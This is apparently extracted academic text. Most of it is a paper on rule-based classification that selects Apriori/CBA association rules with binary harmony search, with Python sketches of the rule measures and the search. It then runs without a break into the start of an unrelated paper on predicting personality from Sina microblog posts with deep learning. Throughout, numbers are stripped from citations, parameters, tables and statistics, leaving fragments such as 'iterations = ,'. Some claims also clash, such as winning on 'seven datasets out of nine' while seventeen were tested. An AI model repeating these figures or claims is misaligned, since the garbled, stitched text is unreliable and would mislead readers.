the apriori algorithm can produce a lot of rules, but many of them are superfluous. to select appropriate rules from the set of all possible rules, constraints on various measures of interestingness can be used. support and confidence are two measures of rule interestingness that mirror the usefulness and the certainty of a rule, respectively (agrawal et al., ). the support is the percentage of the total number of transactions that include all items in the antecedent (if) and consequent (then) parts of the rule. frequent itemsets are those itemsets whose frequency is greater than a predefined minimum support (minsup). confidence is the ratio of the number of transactions that include all items in both the antecedent and the consequent (the support) to the number of transactions that include all items in the antecedent. in other words, confidence is the accuracy of the rule and is usually used in apriori for ranking the rules. the task of association rule mining is to generate all association rules from the set of transactions that have a support greater than minsup and a confidence greater than minconf. since we need to discover the relationship between input attributes and the class label, we need to find all the rules of the form a → b whose antecedent includes some items and whose consequent can only be the class items. high support and high confidence rules are not necessarily interesting. instead of using only support and confidence, we also used the lift measure as a metric for evaluating the significance and reliability of association rules. lift is the ratio of confidence to expected confidence.
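as a toy illustration of these interestingness measures, the sketch below computes support, confidence, and lift for one candidate class association rule over a handful of hypothetical transactions (not one of the benchmark datasets used in the paper):

```python
# support, confidence, and lift for a rule antecedent -> class item,
# computed over hypothetical transactions (each transaction is a set of items)
transactions = [
    {"a", "b", "class=yes"},
    {"a", "class=yes"},
    {"a", "b", "class=no"},
    {"b", "class=no"},
    {"a", "b", "class=yes"},
]

def frequency(itemset):
    """fraction of transactions that contain every item of the itemset."""
    return sum(itemset <= t for t in transactions) / len(transactions)

antecedent, consequent = {"a", "b"}, {"class=yes"}
support = frequency(antecedent | consequent)
confidence = support / frequency(antecedent)
lift = support / (frequency(antecedent) * frequency(consequent))
print(support, confidence, lift)   # 0.4, 0.666..., 1.111...
```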
hence, lift is a value that gives us information about the increase in the probability of the consequent given the antecedent part of a rule. a lift ratio larger than 1.0 implies that the relationship between the antecedent and the consequent is more significant than would be expected if the two were independent, and makes those rules potentially useful for predicting the consequent in unseen instances. the larger the lift ratio, the more significant the association. the three measures are defined as
$\mathrm{support}(x \Rightarrow y) = p(x \cap y)$
$\mathrm{confidence}(x \Rightarrow y) = p(y \mid x) = \dfrac{\mathrm{support}(x \cap y)}{\mathrm{support}(x)}$
$\mathrm{lift}(x, y) = \dfrac{p(x \cap y)}{p(x)\, p(y)}$
another issue that must be considered is the type of dataset that is appropriate for the apriori algorithm. consider a dataset for supervised learning which contains observations of a class label variable and a number of predictor variables. such a dataset can be converted into an appropriate format for association rule mining if both the class label and the predictors are of categorical type. since our benchmark datasets contain continuous variables, we must use a method for handling numeric attributes. there are several methods for this purpose; a traditional one is discretization, which can be static or based on the distribution of the data. we used the method proposed by tsai, lee & yang ( ). associative rules for classification in recent years, some researchers have tried to combine association rule mining and classification (cano, zafra & ventura, ; li, han & pei, ; ma & liu, ; wang, zhou & he, ; wang & wong, ; yin & han, ). their experiments show that this approach achieves better accuracy than conventional classification algorithms such as c4.5. the reason is that the associative classifier is composed of high-quality rules, which are generated from highly confident event associations that reflect the close dependencies among events. the classification based on association rules (cba) algorithm is one of the first efforts at combining classification and association rule mining (ma & liu, ); this algorithm is described in detail in the next section. li, han & pei ( ) suggested a weighted χ2 analysis to perform classification based on multiple association rules (cmar). unlike the cba algorithm, the cmar algorithm uses all the rules that cover the example to be classified instead of using just one rule. yin & han ( ) proposed cpar (classification based on predictive association rules), a rule-based classification algorithm that does not generate a large number of candidate rules as in conventional associative classification; it pursues a greedy algorithm to produce rules directly from the training data and uses the best k rules at prediction time. an advantage of associative classifiers is that they are rule-based and thus lend themselves to being more easily understood by humans. as previously stated, an associative classification system is built in two phases. in the first stage, the learning target is to discover the association patterns inherent in a database (also referred to as knowledge discovery). in the second stage, the goal is to select a small set of relevant association patterns to construct a classifier given the predictor attributes. to produce the best classifier out of the entire set of rules, we would need to consider all feasible subsets of rules and select the most accurate subset, which is clearly impractical.
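before moving on, a short python sketch makes the measures above concrete. the sketch is illustrative only and is not taken from the paper; the toy transaction table and item names are assumptions.

```python
import numpy as np

# toy one-hot transaction table: rows = transactions, columns = items
# (illustrative data only)
items = ["bread", "butter", "milk", "class=yes"]
T = np.array([
    [1, 1, 0, 1],
    [1, 0, 1, 1],
    [0, 1, 1, 0],
    [1, 1, 1, 1],
    [1, 0, 0, 0],
], dtype=bool)

def support(cols):
    """fraction of transactions containing every item in `cols`."""
    return T[:, cols].all(axis=1).mean()

def rule_metrics(antecedent, consequent):
    """support, confidence and lift of the rule antecedent -> consequent."""
    sup_xy = support(antecedent + consequent)
    sup_x = support(antecedent)
    sup_y = support(consequent)
    confidence = sup_xy / sup_x
    lift = sup_xy / (sup_x * sup_y)
    return sup_xy, confidence, lift

# example rule: {bread, butter} -> {class=yes}
ant = [items.index("bread"), items.index("butter")]
con = [items.index("class=yes")]
sup, conf, lift = rule_metrics(ant, con)
print(f"support={sup:.2f} confidence={conf:.2f} lift={lift:.2f}")
```

rules whose lift exceeds 1.0, as discussed above, are the candidates worth keeping as class association rules.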
in the classification phase, some methods (ma & liu, ; thabtah, cowling & peng, ; wang, zhou & he, ) simply select the rule with a maximal user-defined measure, such as confidence. if there is no rule covering the example, then usually the prevalent class is taken to be the predicted class. however, identifying the rule that is most effective at classifying a new case is a big challenge. when a new data object is classified, more than one rule may satisfy the test conditions, and using all of them may increase the prediction accuracy (li, han & pei, ). cba algorithm the classification based on associations (cba) algorithm is one of the first algorithms to bring up the idea of classification using association rules (ma & liu, ). cba implements the well-known apriori algorithm (agrawal, imieliński & swami, ) in order to discover frequent itemsets. once the discovery of frequent itemsets has finished, cba proceeds by converting any frequent itemset that passes minconf into a rule of the classifier. at the rule generation phase, cba selects a special subset of association rules whose right-hand side is restricted to the classification class attribute; this subset of rules is called class association rules (cars). at the next step, the cba algorithm builds a classifier using the cars. at this step, cba uses a heuristic approach: it sorts the rules according to their confidence and selects the top rules that cover the training samples. the algorithm first selects the best rule (the rule with the highest confidence), then eliminates all the covered examples. if at least one example satisfies the rule conditions, that rule is appended to the final rule list. this procedure is repeated until there are no more rules to select or no more examples to cover. the algorithm then stops and returns the classifier in the form of an if-then-else rule list. one challenge with this approach is that greedily selecting the best individual rules may not yield the best subset of rules. the cba system follows the original association rule model and uses a single minsup in its rule generation. this seems inadequate for mining cars, because the class frequency distributions in many practical classification datasets are unbalanced. we used the cba algorithm with three small changes. the first change is that we use multiple minsup values, which can be useful for imbalanced datasets. the second change concerns coverage: in the original cba algorithm, once a sample is covered by a rule it is removed from the samples; we defined a parameter called delta that specifies how many times each sample must be covered before it is removed (li, han & pei, ). this approach leads to the generation of more rules. the third change occurs in the classification phase. in the classification phase of the original cba algorithm, the rule with maximum confidence that covers the test conditions defines the class label of a test sample. instead, we select the top k (a predefined parameter) rules from each class that cover the test sample conditions and determine the class label according to the sum of the confidences of the selected rules. all data preprocessing and analyses were conducted using matlab version a (the mathworks inc., natick, ma, usa). proposed method the proposed method of rule selection based on hs is depicted in fig. . at the initial step, we did some preprocessing on each dataset. one of the main preprocessing steps is the discretization
of continuous features. figure: the framework of the proposed method (training data are discretized, converted to the appropriate format, passed to the apriori algorithm for rule generation; harmony search selects a subset of the generated rules, which are then used together with the cba procedure to classify the test data). we applied a discretization algorithm based on a class-attribute contingency coefficient that was proposed by tsai, lee & yang ( ). after discretization, we convert each dataset to the appropriate format such that the value of each feature can be true (1) or false (0); to this end, if a feature is discretized into n different discrete values, we produce n binary features. after the conditions for the apriori algorithm are satisfied, we run the algorithm for each class with different minsup and minconf values. the main novelty of our study is in the next step. as previously mentioned, the apriori algorithm produces many rules, and the cba algorithm uses a greedy procedure for selecting a subset of the produced rules for building a classifier. using greedy approaches causes the selected rules not to be the best subset of rules. we believe that population-based evolutionary algorithms fit the rule selection problem well. harmony search (hs) is a population-based stochastic search algorithm inspired by the musical process of searching for a perfect state of harmony (geem, kim & loganathan, ). the harmony in music is analogous to the optimization solution vector, and the musician's improvisations are similar to the local and global search methods of optimization techniques. when a musician is improvising, he has three choices: (1) to play any pitch from memory; (2) to play a pitch adjacent to one in his memory; (3) to play a random pitch from the range of all possible pitches. these three options are employed in the hs algorithm by means of three main parameters: harmony memory (hm), harmony memory consideration rate (hmcr), and pitch adjustment rate (par). the hmcr is defined as the probability of selecting a component from the present hm members. the par determines the probability of a candidate from the hm being mutated. the steps of the hs procedure are as follows: step 1. initialize a harmony memory (hm); the initial hm consists of a given number of randomly generated solutions to the optimization problem under consideration. step 2. improvise a new harmony from the hm. step 3. update the hm: if the new harmony is better than the worst harmony in the hm, then include the new harmony in the hm and exclude the worst harmony from it. step 4. if the stopping criteria are not satisfied, go to step 2. hs has been successfully applied to various discrete optimization problems such as the maximum clique problem (afkhami, ma & soleimani, ), the traveling salesperson problem (geem, kim & loganathan, ), tour routing (geem, tseng & park, ), water network design (geem, ), dynamic relocation of mobile base stations in wireless sensor networks (moh'd alia, ), and others. in binary hs, the size of each solution equals the number of candidate rules; for example, if the apriori algorithm produces m rules that satisfy the minsup and minconf conditions, then the size of each solution in hs will be equal to m. each solution consists of a binary vector of rule incidences, indicating exclusion (0) or inclusion (1) of the corresponding rule in the combination.
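the following python sketch illustrates such a binary harmony-search loop over rule-inclusion vectors. it is not the paper's matlab implementation; the bit-flip "pitch adjustment", the toy cost function and the parameter values are illustrative assumptions.

```python
import numpy as np

rng = np.random.default_rng(0)

def binary_harmony_search(cost, n_rules, hm_size=20, hmcr=0.9, par=0.1, n_iter=500):
    """select a 0/1 rule-inclusion vector minimising `cost` (simplified binary hs)."""
    # step 1: initialise the harmony memory with random rule subsets
    hm = rng.integers(0, 2, size=(hm_size, n_rules))
    costs = np.array([cost(h) for h in hm])
    for _ in range(n_iter):
        # step 2: improvise a new harmony component by component
        new = np.empty(n_rules, dtype=int)
        for j in range(n_rules):
            if rng.random() < hmcr:
                new[j] = hm[rng.integers(hm_size), j]   # memory consideration
                if rng.random() < par:
                    new[j] = 1 - new[j]                 # bit-flip "pitch adjustment"
            else:
                new[j] = rng.integers(0, 2)             # random selection
        # step 3: replace the worst harmony if the new one is better
        worst = costs.argmax()
        c = cost(new)
        if c < costs[worst]:
            hm[worst], costs[worst] = new, c
    best = costs.argmin()
    return hm[best], costs[best]

# hypothetical cost: in the real method this is the error rate of a cba-style
# classifier built from the selected rules; here a toy surrogate keeps the sketch self-contained
def toy_cost(mask):
    target = np.zeros(mask.size)
    target[:5] = 1                      # pretend the first 5 rules are the useful ones
    return np.abs(mask - target).mean()

subset, err = binary_harmony_search(toy_cost, n_rules=30)
print("selected rules:", np.flatnonzero(subset), "cost:", err)
```

in the actual method, the cost of a candidate subset is the error rate obtained by applying the modified cba procedure with those rules to the training and validation data, as described next.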
the standard harmony search (hs) is not suitable for binary representations, because the pitch adjusting operator is not able to perform a local search in the binary space. therefore we used the binary hs implementation proposed by afkhami, ma & soleimani ( ). we ran the hs algorithm with the following parameters: maximum number of iterations = , harmony memory size = , number of new harmonies = , harmony memory consideration rate = . . we used harmony search, a music-inspired stochastic search algorithm, for selecting the best subset of rules as a classifier. one of the important components of any meta-heuristic algorithm is the calculation of the cost function. for this aim, we apply a modified version of the cba algorithm to the selected rules and calculate the error rate of applying the resulting rules to the training and validation data. finally, the solution with the minimum cost value is selected, and this solution (a subset of rules) is applied to the test data. the proposed flowchart is shown for one fold of cross-validation; in k-fold cross-validation, this approach is repeated k times, until all the samples in the dataset have been used as test data. the pseudo code of the proposed method is shown in the table below. table: pseudo code of the proposed method. this pseudo code assumes that we have the training input and output, the test input, and the validation input and output, and shows how we build a rule-based classifier and determine the test data output.
for i = 1 to k_fold
    determine traininput, trainoutput, testinput, testoutput, valinput and valoutput
    finalrules = {}
    for j = 1 to number_class
        rules_j = apply apriori algorithm(traininput, minsup_j, minconf_j, class_j)
        finalrules = append rules_j to finalrules
    end %for j
    selected_rules = apply harmony search algorithm(finalrules, traininput, trainoutput, valinput, valoutput)
    testoutput = apply selected_rules on testinput
end %for i
the time complexity of the apriori algorithm and of association rule mining in general is a critical challenge that must be considered (cano, luna & ventura, ; cano, zafra & ventura, ; luna et al., ; thabtah, cowling & hammoud, ). as the time complexity is exponential, some preprocessing can be done to decrease the running time. first of all, feature selection can be applied before the apriori algorithm; it can be done before or after discretization. the second option is related to the size of the rules: as small rules are favorable, we can limit the number of items that appear in a rule and consequently decrease the running time of the apriori algorithm. results we applied the proposed method to seventeen benchmark datasets and compared its results with traditional association rule classification algorithms. we compared our proposed method with the cpar, cba and c4.5 algorithms, which are well known in rule-based classification (ma & liu, ; quinlan, ; yin & han, ). the characteristics of the used datasets are shown in table . we selected datasets with a variety of sizes in samples, attributes and number of classes. to run the experiments, stratified five-fold cross-validation was used to produce reliable accuracy estimates. cross-validation is a standard evaluation procedure for estimating the error rate of a machine learning method. at each run, we split each dataset into five parts: three parts for training, one part for validation and one part for testing.
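for illustration only (this is not the authors' matlab code, and the fold-assignment details are an assumption), the 3/1/1 train-validation-test split per fold could be produced with scikit-learn as follows.

```python
import numpy as np
from sklearn.model_selection import StratifiedKFold

def five_fold_splits(X, y, seed=0):
    """yield (train, validation, test) index arrays: 3 folds train, 1 validation, 1 test."""
    skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=seed)
    folds = [test_idx for _, test_idx in skf.split(X, y)]
    for i in range(5):
        test = folds[i]
        val = folds[(i + 1) % 5]   # the next fold serves as validation
        train = np.concatenate([folds[j] for j in range(5) if j not in (i, (i + 1) % 5)])
        yield train, val, test

# toy usage with random data (illustrative only)
X = np.random.rand(100, 4)
y = np.random.randint(0, 2, size=100)
for train, val, test in five_fold_splits(X, y):
    print(len(train), len(val), len(test))
```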
to increase reliability, the experiments for each dataset were repeated multiple times and the average of the results was reported. table: description of the used datasets; each row lists the dataset name, the number of data items, the number of features, the number of classes and the class distribution (the seventeen datasets are iris, galaxy, wine, tictactoe, saheart, car, breast cancer, yeast, balance scale, lymphography, haberman, mammographic, phoneme, pima, german and two monks datasets). the results of the proposed method are shown in table . table: experiment results based on repetitions of five-fold cross-validation; each row shows the accuracy of the four rule-based classification algorithms (decision tree, cba, cpar and the proposed method) on one dataset, and the last row gives the mean rank of each algorithm. as the results show, on four datasets the decision tree attains the best accuracy, the cpar algorithm has the highest accuracy on five datasets, and our proposed method is the best on seven datasets out of nine. on one dataset, all algorithms are perfect and attain equal accuracy. the cba algorithm is not the best on any of the datasets, and on all of the datasets our proposed method outperformed the cba algorithm. it must be noted that the results of the decision tree, cba and cpar algorithms were reproduced on the same partitions. we used the friedman test (friedman, ) as an appropriate choice for comparing multiple classification algorithms (brazdil & soares, ; demšar, ). the friedman test is a non-parametric statistical test developed by milton friedman (friedman, ; friedman, ). similar to the parametric repeated-measures anova, it is used to detect differences between groups when the dependent variable being measured is ordinal. note that the classification algorithms are ranked on each of the datasets and then the friedman test is applied. the last row of the results table shows the mean rank of each algorithm. as the results show, the proposed method gained the best position and cba the worst one. the results also show that there is an overall statistically significant difference between the mean ranks of the compared algorithms (p = . ). the accuracy reported in other studies may differ from ours for some algorithms. one of the main reasons for this discrepancy is that we had no information about their discretization algorithm, in particular the number of ranges used to discretize continuous attributes; using different discretization approaches can result in different outputs. discussion this research has focused on the application of computational intelligence to association rule mining-based classifiers. although rule-based classification algorithms have high classification accuracy, some of them suffer from a critical limitation: they use a heuristic approach for selecting a subset of rules for building a classifier.
it is obvious that the selected rules may not be the best subset of possible rules. another challenge of existing algorithms is related to rare classes: using greedy approaches, the resulting rules are biased towards prevalent classes, and classifying the rare instances is a major problem. we combined the apriori, cba and harmony search algorithms in order to build a rule-based classifier that has a high prediction accuracy. we used the apriori algorithm with multiple minsup values for rule generation. since the number of rules that satisfy the minsup and minconf conditions is high and considering all subsets of rules is not possible, we applied the harmony search algorithm for finding the best subset of rules that can be used as a classifier. harmony search (hs) is a relatively simple yet very efficient evolutionary algorithm. one of the main components of every population-based algorithm is the calculation of the cost function. for every solution (subset of selected rules) we applied a modified version of the cba algorithm to the training and validation data and assigned the resulting error to the cost function. the statistical and experimental results of applying the proposed method on seventeen benchmark datasets demonstrate that our proposed method outperformed well-known algorithms such as the decision tree, cba and cpar in general. one of the limitations of the proposed method is that it does not attain proper accuracy on datasets with a large number of classes. another limitation of our study is that we used the accuracy measure for comparing the algorithms; measures such as precision and recall would better reflect the benefits of the proposed method. our aim in the future is to tackle these problems. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • hesam hasanpour conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • ramak ghavamizadeh meibodi authored or reviewed drafts of the paper, approved the final draft. • keivan navi authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: this work uses standard benchmark datasets that can be downloaded from https://sci2s.ugr.es/keel/datasets.php and https://archive.ics.uci.edu/ml/index.php. the matlab code is available as a supplemental file. supplemental information supplemental information for this article can be found online. references afkhami s, ma or, soleimani a. a binary harmony search algorithm for solving the maximum clique problem. international journal of computer applications. agrawal r, imieliński t, swami a. mining association rules between sets of items in large databases. in: proceedings of the acm sigmod international conference on management of data, washington dc. new york: acm.
agrawal r, mannila h, srikant r, toivonen h, verkamo ai. fast discovery of association rules. advances in knowledge discovery and data mining. brazdil pb, soares c. a comparison of ranking methods for classification algorithm selection. in: european conference on machine learning. springer. burdick d, calimlim m, gehrke j. mafia: a maximal frequent itemset algorithm for transactional databases. in: proceedings of the international conference on data engineering. piscataway: ieee. cano a, luna jm, ventura s. high performance evaluation of evolutionary-mined association rules on gpus. the journal of supercomputing. cano a, zafra a, ventura s. an interpretable classification rule mining algorithm. information sciences. cano a, zafra a, ventura s. parallel evaluation of pittsburgh rule-based classifiers on gpus. neurocomputing. chen w-c, hsu c-c, hsu j-n. adjusting and generalizing cba algorithm to handling class imbalance. expert systems with applications. demšar j. statistical comparisons of classifiers over multiple data sets. journal of machine learning research. friedman m. the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association. friedman m. a comparison of alternative tests of significance for the problem of m rankings. the annals of mathematical statistics. geem zw. optimal cost design of water distribution networks using harmony search. engineering optimization. geem zw, kim jh, loganathan gv. a new heuristic optimization algorithm: harmony search. simulation. geem zw, tseng c-l, park y. harmony search for generalized orienteering problem: best touring in china. in: international conference on natural computation. springer. ilayaraja m, meyyappan t. mining medical data to identify frequent diseases using apriori algorithm. in: pattern recognition, informatics and mobile engineering (prime), international conference on. piscataway: ieee. jovanoski v, lavrač n. classification rule learning with apriori-c. in: portuguese conference on artificial intelligence. springer. li w, han j, pei j. cmar: accurate and efficient classification based on multiple class-association rules. in: data mining (icdm), proceedings of the ieee international conference on. piscataway: ieee. li j, shen h, topor r. mining the optimal class association rule set. knowledge-based systems. luna jm, cano a, pechenizkiy m, ventura s. speeding-up association rule mining with inverted index compression. ieee transactions on cybernetics. ma blwhy, liu b. integrating classification and association rule mining. in: proceedings of the fourth international conference on knowledge discovery and data mining. mazid mm, ali as, tickle ks.
a comparison between rule based and association rule mining algorithms. in: network and system security (nss), third international conference on. piscataway: ieee. moh'd alia o. dynamic relocation of mobile base station in wireless sensor networks using a cluster-based harmony search algorithm. information sciences. nahar j, imam t, tickle ks, chen y-pp. association rule mining to detect factors which contribute to heart disease in males and females. expert systems with applications. nahar j, tickle ks, ali as, chen y-pp. significant cancer prevention factor extraction: an association rule discovery approach. journal of medical systems. quinlan jr. c4.5: programs for machine learning. burlington: morgan kaufmann. sarno r, dewandono rd, ahmad t, naufal mf, sinaga f. hybrid association rule learning and process mining for fraud detection. international journal of computer science. scheffer t (a). finding association rules that trade support optimally against confidence. in: european conference on principles of data mining and knowledge discovery. springer, berlin, heidelberg. scheffer t (b). finding association rules that trade support optimally against confidence. principles of data mining and knowledge discovery. shin am, lee ih, lee gh, park hj, park hs, yoon ki, lee jj, kim yn. diagnostic analysis of patients with essential hypertension using association rule mining. healthcare informatics research. sun y, wong ak, kamel ms. classification of imbalanced data: a review. international journal of pattern recognition and artificial intelligence. thabtah f, cowling p, hammoud s. improving rule sorting, predictive accuracy and training time in associative classification. expert systems with applications. thabtah fa, cowling p, peng y. mmac: a new multi-class, multi-label associative classification approach. in: data mining (icdm), fourth ieee international conference on. piscataway: ieee. tsai c-j, lee c-i, yang w-p. a discretization algorithm based on class-attribute contingency coefficient. information sciences. wang y, wong akc. from association to classification: inference using weight of evidence. ieee transactions on knowledge and data engineering. wang k, zhou s, he y. growing decision trees on support-less association rules. in: proceedings of the sixth acm sigkdd international conference on knowledge discovery and data mining. new york: acm. yin x, han j. cpar: classification based on predictive association rules. in: proceedings of the siam international conference on data mining. philadelphia: siam. submitted march, accepted august, published september. corresponding authors xiaoqian liu, liuxiaoqian@psych.ac.cn, and tingshao zhu, tszhu@psych.ac.cn. academic editor jinde cao.
copyright liu and zhu, distributed under creative commons cc-by, open access. deep learning for constructing microblog behavior representation to identify social media user's personality. xiaoqian liu and tingshao zhu, institute of psychology, chinese academy of sciences, beijing, china. abstract due to the rapid development of information technology, the internet has gradually become a part of everyday life. people like to communicate with friends and share their opinions on social networks. the diverse behavior on social networks is an ideal reflection of users' personality traits. existing behavior analysis methods for personality prediction mostly extract behavior attributes with heuristic analysis; although they work fairly well, they are hard to extend and maintain. in this paper, we utilize a deep learning algorithm to build a feature learning model for personality prediction, which performs an unsupervised extraction of the linguistic representation feature vector (lrfv) from text actively published on the sina microblog. compared with other feature extraction methods, lrfv, as an abstract representation of microblog content, can describe a user's semantic information more objectively and comprehensively. in the experiments, the personality prediction model is built using a linear regression algorithm, and different attributes obtained through different feature extraction methods are taken as input of the prediction model, respectively. the results show that lrfv performs better in describing microblog behavior and improves the performance of the personality prediction model. subjects artificial intelligence, natural language and speech, social computing keywords personality prediction, social media behavior, deep learning, feature learning introduction personality can be defined as a set of traits in behaviour, cognition and emotion which is distinctive among people (mischel, shoda & ayduk, ). in recent years, researchers have formed a consensus on personality structure and proposed the big five factor model (costa & mccrae, ), which uses five broad domains or factors to describe the human personality: openness (o), conscientiousness (c), extraversion (e), agreeableness (a) and neuroticism (n) (funder, ). traditionally, questionnaires have been widely used for personality assessment, especially the big five personality questionnaire, but the questionnaire form may be inefficient for large populations. due to the rapid development of information technology, the internet has become part of everyday life. people prefer expressing their thoughts and interacting with friends on social network platforms. therefore, researchers pay more and more attention to figuring out the correlation between the behavior of users on social networks and their personality traits in order to realize automatic personality prediction by machine learning methods.
nowadays, the internet is not used just for communication, but also as a platform for users to express their thoughts, ideas and feelings. personality is indirectly expressed by users' behavior on the social network, which refers to a variety of operations on the social network, such as commenting, following and liking. in addition, the text, punctuation and emoticons published by users can be regarded as one kind of social behavior. therefore, for automatic personality prediction, how to abstract these diverse and complex behaviors and acquire a digital representation of social network behaviors has become a critical problem. existing behavior analysis methods are mostly based on statistical rules, but such manual means have disadvantages in objectivity and completeness. generally, attributes are especially important for the performance of a prediction model: a set of proper feature vectors can improve the effectiveness of a prediction model to a certain extent. therefore, it is required that the attributes are not only a comprehensive and abstract description of an individual's behavior characteristics, but also reflect the diversity of different individuals' behaviors. in this paper, we use a deep learning algorithm to perform an unsupervised extraction of the lrfv from users' content published on the sina microblog. compared with other attributes obtained by manual means, the lrfv can represent users' linguistic behavior more objectively and comprehensively. there are two reasons for utilizing a deep learning algorithm to investigate the correlation between users' linguistic behavior on social media and their personality traits. one is that a deep learning algorithm can extract a high-level abstract representation of the data layer by layer by exploiting arithmetical operations and the architecture of the model; it has been successfully applied in computer vision, object recognition and other research areas. the other is that the scale of social network data is huge, and the deep learning algorithm can meet the computational demands of big data. given all this, in this article we have done a preliminary study on constructing a microblog linguistic representation for personality prediction based on the deep learning algorithm. related work at present, many researchers have paid attention to the correlation between users' internet behaviors and their personality traits. qiu et al. ( ) investigated the relationship between tweets posted on twitter and users' personality, and they found that some personality characteristics such as openness (o), extraversion (e) and agreeableness (a) are related to specific words used in tweets. similarly, vazire & gosling ( ) discovered that there is great relevance between users' specific internet behaviors and their personality by studying users' behaviors on personal websites. these conclusions can be explained as personality not only influencing people's daily behaviors, but also playing an important role in users' internet behaviors. with the rise of social media, more and more researchers have begun to analyse users' personality traits through social network data with the help of computer technology. sibel & golbeck ( ) predicted users' personality based on operational behaviors on twitter utilizing a linear regression model. similarly, golbeck et al. ( ) used a regression algorithm to build a personality prediction model, but they considered both operational behaviors and linguistic behaviors.
lima & de castro ( ) used a semi-supervised method to predict personality based on the attributes of linguistic behaviors extracted from tweets. ortigosa, carro & quiroga ( ) built a personality prediction model of users according to their social interactions in facebook by machine-learning methods, such as classification trees. although many researchers have utilized machine learning methods to build personality prediction models and have made some achievements, there are also some disadvantages for which improvements are needed. first, in state-of-the-art methods, the behavior analysis and behavior attribute extraction methods are mostly based on experiential heuristic rules which are set manually. the behavior attributes extracted manually by statistical methods may not be able to comprehensively and objectively describe the characteristics of the behaviors. second, supervised and semi-supervised behavior feature extraction methods need a certain amount of labeled data, but obtaining a large amount of labeled data is difficult, time-consuming and costly. therefore, supervised and semi-supervised feature extraction methods are not suitable for a wide range of applications. deep learning in recent years, there has been more and more interdisciplinary research between computational science and psychology (zhang et al., ; chen et al., ). deep learning is a set of algorithms in machine learning (bengio, ; bengio, courville & vincent, ) which has a hierarchical structure in accordance with the biological characteristics of the human brain. the deep learning algorithm originated in artificial neural networks, and has been applied successfully in many artificial intelligence applications, such as face recognition (huang, lee & learned-miller, ), image classification (ciresan, meier & schmidhuber, ), natural language processing (socher et al., ) and so on. recently, researchers have been attempting to apply deep learning algorithms to other research fields. huijie et al. ( a) and huijie et al. ( b) used the cross-media auto-encoder (cae) to extract feature vectors and identified users' psychological stress based on social network data. due to the multi-layer structure and the underlying mathematics, deep learning algorithms can extract a more abstract high-level representation from low-level features through multiple non-linear transformations, and discover the distribution characteristics of the data. in this paper, based on the deep learning algorithm, we train unsupervised linguistic behavior feature learning models for the five factors of personality. through the feature learning models, the lrfv corresponding to each personality trait can be learned actively from users' content published on the sina microblog. the lrfv can describe the users' linguistic behavior more objectively and comprehensively, and improve the accuracy of the personality prediction model. dataset in this paper, we utilize a deep learning algorithm to construct an unsupervised feature learning model which can actively and objectively extract the linguistic representation feature vector (lrfv) from users' content published on the sina microblog. next, five personality prediction models corresponding to the five personality traits are built using a linear regression algorithm based on the lrfv.
we conducted preliminary experiments on relatively small data as a pre-study to explore the feasibility of using a deep learning algorithm to investigate the correlation between a user's social network behavior and personality. data collection nowadays, users prefer expressing their attitudes and feelings through social networks. therefore, the linguistic information on social networks is more significant for analysing users' personality characteristics. in this paper, we pay more attention to the correlation between users' linguistic behaviors on the sina microblog and their personalities. according to the latest statistics, by the end of dec. the total number of registered users of the sina microblog had exceeded million, and on the spring festival's eve the number of daily active users was more than one billion. it can be said that the sina microblog is currently one of the most popular social network platforms in china. similarly to facebook and twitter, sina microblog users can post blogs to share what they saw and heard. through the sina microblog, people express their inner thoughts and ideas, follow friends or someone they want to pay attention to, and comment on or repost blogs that interest them or with which they agree. for data collection, we first released the experiment recruitment information on the sina microblog. based on the assumption that the users often express themselves on the social media platform, we try to construct a personality prediction model; so it is required that there is enough sina microblog data for each person. on the other hand, some participants might provide deprecated or secondary social network accounts rather than their commonly used and actual accounts when participating in our experiment; such data are unfaithful. in consideration of this, we set "active user" selection criteria for choosing effective and authentic samples. our human study was reviewed and approved by the institutional review board, and the protocol number is "h ." in total, volunteers were recruited to participate in our experiments. they had to finish the big five questionnaire (vittorio et al., ) online and authorize us to obtain their public personal information and all blogs. collecting the volunteers' sina microblog ids, we obtained their microblog data through the sina microblog api. the collected microblog data consist of all of the users' blogs and their basic status information, such as age, gender, province, personal description and so on. the whole process of subject recruitment and data collection lasted nearly two months. through the preliminary screening, we finally obtained the set of valid samples. when filtering invalid and noisy data, we designed some heuristic rules as follows (a simple sketch of this screening appears after the list): • if the total number of one's microblogs is more than the threshold, this volunteer is a valid sample; this rule ensures that the volunteer is an active user. • in order to ensure the authenticity of the questionnaire results, we set several polygraph questions in the questionnaire; samples with unqualified questionnaires were removed. • when the volunteers filled out the questionnaire online, the time they took on each question was recorded; if the answering time was too short, the corresponding volunteer was considered an invalid sample. in our experiments, we required the answering time to be longer than a minimum number of seconds.
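as an illustration only (the thresholds below are hypothetical placeholders, since the exact cut-offs are not reproduced here), the screening rules above could be expressed as a simple pandas filter.

```python
import pandas as pd

# hypothetical thresholds; the paper's exact values are not reproduced here
MIN_BLOG_COUNT = 500        # "active user" rule: minimum number of microblogs
MIN_ANSWER_SECONDS = 2.0    # minimum time spent per questionnaire item

def screen_participants(df: pd.DataFrame) -> pd.DataFrame:
    """keep volunteers who are active users, pass the polygraph items,
    and did not rush through the questionnaire."""
    ok = (
        (df["blog_count"] >= MIN_BLOG_COUNT)
        & df["passed_polygraph_items"]
        & (df["min_answer_time_s"] >= MIN_ANSWER_SECONDS)
    )
    return df[ok]

# toy usage with made-up records
volunteers = pd.DataFrame({
    "user_id": [1, 2, 3],
    "blog_count": [1200, 80, 900],
    "passed_polygraph_items": [True, True, False],
    "min_answer_time_s": [3.1, 4.0, 2.5],
})
print(screen_participants(volunteers))
```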
